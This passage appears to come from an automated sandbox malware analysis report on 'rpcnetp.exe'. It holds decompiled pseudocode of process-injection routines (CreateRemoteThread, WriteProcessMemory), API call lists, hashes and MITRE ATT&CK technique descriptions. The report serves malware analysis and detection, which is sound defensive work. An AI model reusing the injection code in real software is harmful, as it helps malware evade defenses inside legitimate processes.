						E72B21F95(_t41, _t42, _t43, _t45, _t47,  *( *(_t48 - 0x1c) + 0x370c),  *(_t48 - 0x1c));
					}
					LocalFree( *(_t48 - 0x1c));
				}
				 *(_t48 - 4) =  *(_t48 - 4) | 0xffffffff;
				ExitThread(0);
			}

APIs

LocalAlloc.KERNEL32(00000040,00004464,72B25398,00000010), ref: 72B21C8E
GetStdHandle.KERNEL32(000000F4), ref: 72B21C99
WriteProcessMemory.KERNEL32(00000000,?,00000000,00000004,?), ref: 72B21CC2
ReadProcessMemory.KERNEL32(00000000,?,00000000,00000078,?), ref: 72B21CD7

Part of subcall function 72B21F95: GetStdHandle.KERNEL32(000000F4,72B253A8,000006C0,72B21D08,00000000), ref: 72B21FB7
Part of subcall function 72B21F95: GetStdHandle.KERNEL32(000000F6,000000FF,?,?,?,?,0000032E,?,00000000,0000032E), ref: 72B22033
Part of subcall function 72B21F95: CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,?,00000004,?), ref: 72B2205F
Part of subcall function 72B21F95: ResumeThread.KERNEL32(00000000,?,?,72B21829,00000001,?,?,00000000,00000002,000000FF,?,?,?,?,0000032E,?), ref: 72B220C1
Part of subcall function 72B21F95: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 72B220D0
Part of subcall function 72B21F95: CloseHandle.KERNEL32(00000000), ref: 72B220D9

LocalFree.KERNEL32(00000000), ref: 72B21D0B
ExitThread.KERNEL32 ref: 72B21D20

Memory Dump Source

Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true

Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd

Similarity

API ID: Handle$Thread$LocalMemoryProcess$AllocCloseCreateExitFreeMultipleObjectsReadRemoteResumeWaitWrite
String ID:
API String ID: 3187294079-0
Opcode ID: 0d373e486fbd5fa3d520274f4ca0a1fec86b10583ae1df6bb5ea309636de2055
Instruction ID: c86dc8486e0665793866c7a9820250b529532658d765509b66e6b22a8b28303e
Opcode Fuzzy Hash: 0d373e486fbd5fa3d520274f4ca0a1fec86b10583ae1df6bb5ea309636de2055
Instruction Fuzzy Hash: 52113A7295034AEFDB118FA5CC48FEE7BF8EB44361F158229E529B7192D7389501CB20

Uniqueness

Uniqueness Score: -1.00%

Function 72B224BC, Relevance: 7.6, APIs: 5, Instructions: 54
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E72B224BC(void* __ecx, void* _a4, _Unknown_base(*)()* _a8, void* _a12, intOrPtr _a16, DWORD* _a20, intOrPtr _a24) {
				intOrPtr _v8;
				int _v12;
				void* _t14;
				int _t15;
				DWORD* _t20;
				intOrPtr _t24;

				_t20 = _a20;
				_t24 = _a16;
				_v12 = 0;
				_v8 = _t24;
				 *_t20 = 0;
				_t14 = CreateRemoteThread(_a4, 0, 0, _a8, _a12, 0, 0);
				_v12 = _t14;
				if(_t14 == 0) {
					_t15 = TerminateProcess(_a4, 0);
				} else {
					if(_a24 != 0) {
						_push(0xffffffff);
						_push(0);
						_push( &_v12);
						if(_t24 == 0) {
							_push(1);
						} else {
							_push(2);
						}
						if(WaitForMultipleObjects() == 0) {
							GetExitCodeThread(_v12, _t20);
						}
					} else {
						 *_t20 = 1;
					}
					_t15 = CloseHandle(_v12);
				}
				return _t15;
			}

APIs

CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000000,00000000), ref: 72B224E1
WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF), ref: 72B2250C
GetExitCodeThread.KERNEL32(?,?), ref: 72B2251A
CloseHandle.KERNEL32(?), ref: 72B22523
TerminateProcess.KERNEL32(?,00000000), ref: 72B2252F

Memory Dump Source

Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true

Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd

Similarity

API ID: Thread$CloseCodeCreateExitHandleMultipleObjectsProcessRemoteTerminateWait
String ID:
API String ID: 1317926807-0
Opcode ID: ad490c33ec95803bfa012c41048570bec1150f9c707f8b142208b7c855e28eec
Instruction ID: 43fb7a0f769fbdbb6116ecc8b05a183b5ca6aff15e3d6e9499a38349c8af174b
Opcode Fuzzy Hash: ad490c33ec95803bfa012c41048570bec1150f9c707f8b142208b7c855e28eec
Instruction Fuzzy Hash: E6113971401228BFCB225F56CC58ECF7FB9EF497A2F118505F50AA6152D3309651CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 72B229E4, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 78
stringCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E72B229E4(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t53;
				signed int _t58;
				void* _t61;
				intOrPtr _t63;
				intOrPtr _t65;
				void* _t66;

				_t61 = __edx;
				_push(0x40);
				_push(0x72b253e8);
				E72B24A94(__ebx, __edi, __esi);
				_t65 =  *((intOrPtr*)(_t66 + 8));
				_t58 = 0;
				 *((intOrPtr*)(_t66 - 0x20)) = 0;
				_t63 = 0;
				 *(_t66 - 4) = 0;
				while(1) {
					_push(_t58);
					_push(_t58);
					_push(_t66 - 0x24);
					_push( *((intOrPtr*)(_t65 + 0x3c60)));
					if( *((intOrPtr*)(_t65 + 0x3c80))() == 0 ||  *((intOrPtr*)(_t66 - 0x24)) == _t58) {
						break;
					}
					_t53 =  *((intOrPtr*)(_t66 + 0x10)) - _t63;
					if(_t53 >  *((intOrPtr*)(_t66 - 0x24))) {
						_t53 =  *((intOrPtr*)(_t66 - 0x24));
					}
					_push(_t66 - 0x1c);
					_push(_t53);
					_push( *((intOrPtr*)(_t66 + 0xc)) + _t63);
					_push( *((intOrPtr*)(_t65 + 0x3c60)));
					if( *((intOrPtr*)(_t65 + 0x3c84))() != 0 &&  *((intOrPtr*)(_t66 - 0x1c)) != _t58) {
						_t63 = _t63 +  *((intOrPtr*)(_t66 - 0x1c));
						 *((intOrPtr*)(_t66 - 0x28)) = _t63;
						continue;
					}
					break;
				}
				 *((intOrPtr*)( *((intOrPtr*)(_t66 + 0x14)))) = _t63;
				if(_t63 != _t58) {
					lstrcpyA(_t66 - 0x50, "TagId");
					 *((intOrPtr*)(_t66 - 0x1c)) = 0x28;
					_push(0);
					_push(_t66 - 0x1c);
					_push(_t66 - 0x50);
					_push(0xffff);
					_push( *((intOrPtr*)(_t65 + 0x3c60)));
					if( *((intOrPtr*)(_t65 + 0x3c88))() != 0) {
						lstrcpyA(_t65 + 0x3cb0, _t66 - 0x50);
					}
					 *((intOrPtr*)(_t66 - 0x20)) = E72B22F96( *((intOrPtr*)(_t66 + 0xc)), _t63);
					_t58 = 0;
				}
				 *(_t66 - 4) =  *(_t66 - 4) | 0xffffffff;
				if( *((intOrPtr*)(_t66 - 0x20)) == _t58) {
					 *(_t65 + 0x5c) =  *(_t65 + 0x5c) & 0x000000fb;
					 *((intOrPtr*)( *((intOrPtr*)(_t66 + 0x14)))) = _t58;
				}
				return E72B2159C( *((intOrPtr*)(_t66 - 0x20)), _t61);
			}

APIs

lstrcpyA.KERNEL32(?,TagId), ref: 72B22A65
lstrcpyA.KERNEL32(?,?), ref: 72B22A98

Strings

(, xrefs: 72B22A67
TagId, xrefs: 72B22A56

Memory Dump Source

Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true

Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd

Similarity

API ID: lstrcpy
String ID: ($TagId
API String ID: 3722407311-2515966560
Opcode ID: 5c04ce69d854c161a030a32ac655c9bf5b29ab1e6395f1117f767b8e90661107
Instruction ID: 937e6d634195ed91134bc96762776da25fbf2bc6e85c9379a4a0c7bdf025302a
Opcode Fuzzy Hash: 5c04ce69d854c161a030a32ac655c9bf5b29ab1e6395f1117f767b8e90661107
Instruction Fuzzy Hash: 0031EAB190074A9FEB21CFA9CD849EEB7F8FF49301F104529E56AF6550DB70AA00CB20

Uniqueness

Uniqueness Score: -1.00%

Function 72B21F30, Relevance: 6.0, APIs: 4, Instructions: 31
synchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E72B21F30(void* _a4, intOrPtr _a8) {
				void* _t6;
				void* _t8;
				void* _t14;

				_t14 = _a4;
				if(_t14 != 0) {
					_t16 = _a8;
					if(_a8 != 0) {
						E72B21DE6(_t14, 0x7fffffff);
					}
					E72B21E58(_t16, _t14);
					_t8 =  *(_t14 + 0x3ba4);
					if(_t8 != 0) {
						if(WaitForSingleObject(_t8, 0x1388) == 0x102) {
							TerminateThread( *(_t14 + 0x3ba4), 0);
						}
						CloseHandle( *(_t14 + 0x3ba4));
					}
					return LocalFree(_t14);
				}
				return _t6;
			}

0x72b21f34
0x72b21f39
0x72b21f3b
0x72b21f3f
0x72b21f47
0x72b21f47
0x72b21f4d
0x72b21f52
0x72b21f5a
0x72b21f6d
0x72b21f77
0x72b21f77
0x72b21f83
0x72b21f83
0x00000000
0x72b21f8a
0x72b21f92

APIs

WaitForSingleObject.KERNEL32(?,00001388,?,00000000,?,72B23101,00000000,?), ref: 72B21F62
TerminateThread.KERNEL32(?,00000000,?,72B23101,00000000,?), ref: 72B21F77
CloseHandle.KERNEL32(?,?,72B23101,00000000,?), ref: 72B21F83
LocalFree.KERNEL32(?,?,00000000,?,72B23101,00000000,?), ref: 72B21F8A

Part of subcall function 72B21DE6: GetMessageA.USER32 ref: 72B21E0C
Part of subcall function 72B21DE6: TranslateMessage.USER32(?), ref: 72B21E33
Part of subcall function 72B21DE6: DispatchMessageA.USER32 ref: 72B21E3D

Memory Dump Source

Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true

Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd

Similarity

API ID: Message$CloseDispatchFreeHandleLocalObjectSingleTerminateThreadTranslateWait
String ID:
API String ID: 2048180657-0
Opcode ID: 96f95f19e928b8abd5f893f00144e223d4d97deb48a41187eccbe0a9266068be
Instruction ID: 30d08b297c30fda9417a0af8e49c41b064fc214c9d90f03f7e5885ec2cf4e8c1
Opcode Fuzzy Hash: 96f95f19e928b8abd5f893f00144e223d4d97deb48a41187eccbe0a9266068be
Instruction Fuzzy Hash: 4AF0B432161B10ABC7216A26CC08BCB76ECDF81796F111514F62AA6183C77455408B95

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report rpcnetp.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Initial Sample

Dropped Files

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Exports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage